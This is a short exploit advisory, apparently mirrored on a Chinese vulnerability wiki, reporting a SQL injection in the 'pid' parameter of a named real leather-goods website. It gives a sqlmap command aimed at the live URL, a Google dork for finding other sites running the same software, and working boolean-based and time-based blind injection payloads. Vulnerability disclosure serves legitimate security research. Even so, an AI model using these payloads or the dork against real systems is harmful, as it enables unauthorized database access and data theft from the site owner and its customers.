Loading
0

Scleather SQL注入漏洞

PWNWIK.COM

,

****************************
#Exploit Title: scleather - SQL Injection vulnerability
#Date: 2021-06-27
#Exploit Author: Mahdi Karimi
#Vendor Homepage: www.scleather.co.th
#Google Dork: "Powered by scleather"
#Tested On: windows 10


sqlmap:
sqlmap -u "http://www.scleather.co.th/addcart.php?pid=1096" --dbs
Testing Method;
- boolean-based blind
- time-based blind


Parameter: pid (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=1096' AND 5351=5351 AND 'YCAF'='YCAF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: pid=1096' AND (SELECT 8639 FROM (SELECT(SLEEP(5)))WmEq) AND 'HjJG'='HjJG

**************************************************
#Discovered by: Mahdi Karimi
#Email : email protected
**************************************************

免费、自由、人人可编辑的漏洞库